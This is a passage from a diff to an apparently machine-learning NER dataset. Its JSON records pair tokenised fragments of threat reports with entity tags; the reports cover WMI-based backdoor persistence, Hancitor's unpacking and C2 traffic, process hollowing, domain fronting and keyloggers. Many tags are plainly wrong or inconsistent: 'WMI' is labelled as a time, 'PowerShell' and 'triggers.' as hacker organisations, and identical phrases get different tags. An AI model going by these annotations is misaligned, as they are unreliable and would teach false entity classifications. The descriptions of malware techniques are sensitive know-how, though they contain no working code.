"declarations", + "and", + "win32", + "structures/constants." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "being", + "able", + "to", + "use", + "the", + ".NET", + "framework", + "APIs", + "directly", + "from", + "Python." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "use", + ".NET", + "framework", + "APIs" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "the", + ".NET", + "framework", + "APIs" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "when", + ".NET", + "framework", + "APIs", + "are", + "used", + "in", + "the", + "code" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "WMI", + "to", + "both", + "store", + "and", + "persist", + "the", + "backdoor" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Management", + "Instrumentation", + "(WMI)." + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "B-Way" + ] + }, + { + "tokens": [ + "to", + "use", + "WMI", + "for", + "storage", + "and", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMI", + "provides", + "many", + "administrative", + "capabilities", + "on", + "local", + "and", + "remote", + "systems,", + "including", + "querying", + "system", + "information,", + "starting", + "and", + "stopping", + "processes,", + "and", + "setting", + "conditional", + "triggers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "WMI", + "can", + "be", + "accessed", + "using", + "a", + "variety", + "of", + "tools,", + "including", + "the", + "Windows", + "WMI", + "Command-line", + "(wmic.exe),", + "or", + "through", + "APIs", + "accessible", + "to", + "programming", + "and", + "scripting", + "languages", + "such", + "as", + "PowerShell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WMI", + "permanent", + "event", + "subscriptions", + "can", + "be", + "used", + "to", + "trigger", + "actions", + "when", + "specified", + "conditions", + "are", + "met." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Subscriptions", + "consist", + "of", + "three", + "core", + "WMI", + "classes:", + "a", + "Filter,", + "a", + "Consumer,", + "and", + "a", + "FilterToConsumerBinding." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WMI", + "Consumers", + "specify", + "an", + "action", + "to", + "be", + "performed,", + "including", + "executing", + "a", + "command,", + "running", + "a", + "script,", + "adding", + "an", + "entry", + "to", + "a", + "log,", + "or", + "sending", + "an", + "email" + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Creating", + "a", + "WMI", + "permanent", + "event", + "subscription" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMI", + "Filters", + "define", + "conditions", + "that", + "will", + "trigger", + "a", + "Consumer,", + "including", + "system", + "startup,", + "the", + "execution", + "of", + "a", + "program," + ], + "ner_tags": [ + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "created", + "a", + "WMI", + "event", + "subscription", + "in", + "order", + "to", + "execute", + "the", + "backdoor" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "WMI", + "to", + "persist", + "a", + "backdoor", + "and", + "also", + "store", + "the", + "PowerShell", + "backdoor", + "code." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "created", + "a", + "new", + "WMI", + "class", + "and", + "added", + "a", + "text", + "property", + "to", + "it", + "in", + "order", + "to", + "store", + "a", + "string", + "value." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "WMI", + "component", + "of", + "the", + "POSHSPY", + "backdoor", + "leverages", + "a", + "Filter", + "to", + "execute", + "the", + "PowerShell", + "component", + "of", + "the", + "backdoor", + "on", + "a", + "regular", + "basis." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMI", + "Component" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "“BfeOnServiceStartTypeChange”", + "WMI", + "Query", + "Language", + "(WQL)", + "filter", + "condition", + "The", + "BfeOnServiceStartTypeChange", + "Filter", + "was", + "bound", + "to", + "the", + "CommandLineEventConsumer", + "WindowsParentalControlsMigration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "legitimate", + "WMI", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker", + "use", + "of", + "WMI" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WMI", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O" + ] + }, + { + "tokens": [ + "decrypted,", + "and", + "executed", + "the", + "backdoor", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decoded", + "CommandLineTemplate", + "PowerShell", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wrote", + "the", + "encrypted", + "and", + "base64-encoded", + "PowerShell", + "backdoor", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "base64-encoded", + "PowerShell", + "command." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "executing", + "PowerShell", + "code", + "as", + "an", + "EncodedCommand" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "and", + "execute", + "additional", + "PowerShell", + "code", + "and", + "Windows", + "binaries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloading", + "and", + "executing", + "PowerShell", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypting", + "communications", + "using", + "AES", + "and", + "RSA", + "public", + "key", + "cryptography" + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Writing", + "executables", + "to", + "a", + "randomly-selected", + "directory", + "under", + "Program", + "Files,", + "and", + "naming", + "the", + "EXE", + "to", + "match", + "the", + "chosen", + "directory", + "name" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Appending", + "a", + "file", + "signature", + "header", + "to", + "all", + "encrypted", + "data," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "appended", + "file", + "headers", + "used", + "to", + "bypass", + "content", + "inspection", + "made", + "this", + "backdoor", + "difficult", + "to", + "identify" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Word", + "document", + "lure", + "requesting", + "the", + "user", + "to", + "run", + "the", + "VBA", + "macro." + ], + "ner_tags": [ + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "opened,", + "the", + "user", + "sees", + "a", + "social", + "engineering", + "image", + "telling", + "them", + "that", + "they", + "must", + "click", + "the", + "“Enable", + "editing”", + "button", + "to", + "see", + "the", + "document’s", + "contents." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Packed", + "DLL", + "analysis" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packing", + "being", + "used", + "to", + "obfuscate", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "there", + "is", + "indeed", + "some", + "sort", + "of", + "unpacking", + "happening." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Although", + "the", + "unpacking", + "procedure", + "happens", + "in", + "multiple", + "steps" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "soon", + "as", + "the", + "unpacked", + "executable", + "is", + "running" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "Examination", + "of", + "its", + "Unpacking", + "Routine" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "unpacking", + "routine" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "“.tmp”", + "file", + "is", + "found,", + "it", + "is", + "moved", + "and", + "renamed", + "to", + "the", + "Office", + "templates", + "folder" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loaded", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "As", + "a", + "second", + "argument,", + "the", + "macro", + "passes", + "the", + "entry", + "function", + "“DllUnregisterServer”", + "to", + "rundll32.exe", + "so", + "that", + "the", + "execution", + "starts", + "correctly." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "runs", + "rundll32.exe", + "to", + "load", + "the", + "malware." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "it", + "using", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Looking", + "at", + "the", + "decrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryption", + "process", + "starts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "data", + "that", + "will", + "be", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "algorithm", + "to", + "decrypt", + "the", + "data", + "is", + "simple." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "second", + "decryption", + "stage", + "occurs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "memory", + "structure" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "the", + "decryption", + "starts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "the", + "decryption", + "algorithm", + "for", + "the", + "second", + "stage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "output", + "of", + "this", + "decryption" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "executable", + "code", + "used", + "to", + "decrypt", + "the", + "encrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "successfully", + "decrypting", + "the", + "C2", + "URLs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "all", + "the", + "decrypted", + "C2", + "URLs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "calls", + "a", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Although", + "the", + "decoding", + "algorithm", + "of", + "the", + "C2", + "response", + "looks", + "quite", + "complex,", + "it", + "is", + "actually", + "Base64", + "decoding,", + "followed", + "by", + "an", + "XOR", + "operation", + "using", + "the", + "key", + "0x7A." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "decryption", + "function." + ], + "ner_tags": [ + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "decrypted", + "to", + "an", + "active", + "malware", + "download", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "API", + "function", + "located", + "at", + "the", + "beginning", + "of", + "the", + "memory", + "section", + "are", + "resolved", + "using", + "GetProcAddress" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Windows", + "API", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "API", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "resolving", + "the", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "names", + "of", + "Windows", + "API", + "functions", + "are", + "stored", + "in", + "the", + "first", + "150", + "bytes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "several", + "Windows", + "API", + "functions", + "are", + "resolved", + "using", + "GetProcAddress" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "memory", + "structure", + "contains", + "executable", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Data", + "view", + "of", + "the", + "section", + "containing", + "the", + "encrypted", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "area", + "after", + "this", + "contains", + "encrypted", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Structure", + "of", + "the", + "encrypted", + "section." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "URLs", + "contained", + "in", + "the", + "malware", + "itself." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "technique", + "is", + "called", + "self-injection", + "or", + "PE", + "overwrite" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "This", + "function", + "obtains", + "the", + "username," + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "the", + "computer", + "name", + "and", + "the", + "domain", + "of", + "infected", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "computer", + "architecture" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "generated", + "based", + "on", + "the", + "computer", + "architecture." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "subsequent", + "functions", + "collect", + "additional", + "information", + "such", + "as", + "the", + "machine’s", + "public", + "IP", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "determine", + "the", + "command", + "and", + "control", + "(C2)", + "servers", + "waiting", + "for", + "the", + "data", + "to", + "be", + "sent", + "to,", + "the", + "malware", + "calls", + "a", + "decryption", + "function", + "that", + "uses", + "the", + "RC4", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "successfully", + "decrypting", + "the", + "C2", + "URLs,", + "the", + "data", + "is", + "sent", + "there", + "using", + "a", + "HTTP", + "POST", + "request", + "adding", + "the", + "constructed", + "query", + "string", + "as", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "making", + "a", + "HTTP", + "GET", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "initiates", + "a", + "download,", + "which", + "delivers", + "an", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Its", + "main", + "purpose", + "is", + "to", + "download", + "and", + "execute", + "a", + "second", + "stage", + "malware", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Thread", + "Execution", + "Hijacking" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Thread", + "Execution", + "Hijacking" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "final", + "execution", + "method", + "Hancitor", + "supports", + "is", + "Thread", + "Execution", + "Hijacking." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "only", + "difference", + "is", + "that", + "the", + "malware", + "replaces", + "the", + "thread", + "context", + "with", + "the", + "downloaded", + "executable", + "and", + "resumes", + "it", + "afterwards." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "Hollowing" + ], + "ner_tags": [ + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Process", + "Hollowing" + ], + "ner_tags": [ + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "If", + "the", + "Process", + "Hollowing", + "method", + "is", + "used,", + "a", + "new", + "svchost.exe", + "process", + "is", + "created", + "in", + "a", + "suspended", + "state." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "then", + "allocates", + "new", + "memory", + "in", + "the", + "newly-created", + "process,", + "writes", + "the", + "executable", + "to", + "it", + "and", + "executes", + "it", + "in", + "a", + "new", + "thread." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "Injection", + "method" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "was", + "distributed", + "as", + "email", + "Word", + "document", + "attachments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "B-Way" + ] + }, + { + "tokens": [ + "then", + "recursively", + "searches", + "through", + "all", + "local", + "temp", + "folders." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Query", + "string", + "containing", + "system", + "information", + "before", + "being", + "sent", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "uses", + "domain", + "fronting", + "to", + "obfuscate", + "its", + "true", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "fronted", + "domain", + "is", + "configured", + "by", + "an", + "earlier", + "stage", + "of", + "execution", + "and", + "the", + "actual", + "domain", + "is", + "hard-coded", + "in", + "the", + "backdoor." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "initiated", + "the", + "first", + "connection", + "to", + "the", + "fronted", + "domain" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "communicates", + "with", + "its", + "C2", + "server", + "using", + "HTTPS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "its", + "C2", + "server", + "consists", + "of", + "JSON", + "data", + "exchanged", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "POST", + "request", + "that", + "contains", + "the", + "command", + "output." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C2", + "server", + "via", + "a", + "subsequent", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "its", + "C2", + "server", + "via", + "a", + "subsequent", + "HTTP", + "POST", + "request." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "its", + "C2", + "server", + "every", + "five", + "seconds", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor", + "that", + "supports", + "commands,", + "including", + "screen", + "capture" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Upload", + "a", + "screen", + "capture" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "keystroke", + "capture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "writes", + "captured", + "keystrokes", + "to", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "continuously", + "captures", + "keystrokes" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "keylogging", + "utility" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "attacker", + "utilized", + "an", + "additional", + "keylogging", + "utility" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "keylogging", + "utility", + "was", + "configured", + "to", + "capture", + "and", + "record", + "keystrokes", + "to", + "C:\\ProgramData\\psh\\System32Log.txt." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Keylogger", + "Deployment" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "keylogger" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "may", + "also", + "download", + "and", + "execute", + "additional", + "PowerShell", + "commands", + "from", + "its", + "command", + "and", + "control", + "(C2)", + "server." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloaded", + "VBScript", + "and", + "PowerShell" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "PowerShell", + "script", + "block", + "was", + "executed", + "to", + "download" + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "to", + "connect", + "to", + "third-party", + "file", + "sharing", + "sites", + "to", + "download", + "the", + "UltraVNC", + "application" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "to", + "connect", + "to", + "third-party", + "file", + "sharing", + "sites", + "to", + "download", + "an", + "NGROK", + "utility" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "UltraVNC", + "to", + "download", + "two", + "LNK", + "files" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "UltraVNC", + "to", + "download", + "an", + "in-memory", + "dropper" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "UltraVNC", + "to", + "download", + "and", + "store", + "a", + "file" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deployed", + "additional", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Data", + "field", + "may", + "contain", + "RC4-encrypted,", + "Base64-encoded", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "uses", + "an", + "RC4", + "key", + "configured", + "by", + "an", + "earlier", + "stage", + "of", + "execution", + "to", + "encrypt", + "and", + "decrypt", + "the", + "Data", + "field" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "observed", + "the", + "RC4", + "key", + "UwOdHsFXjdCOIrjTCfnblwEZ", + "used", + 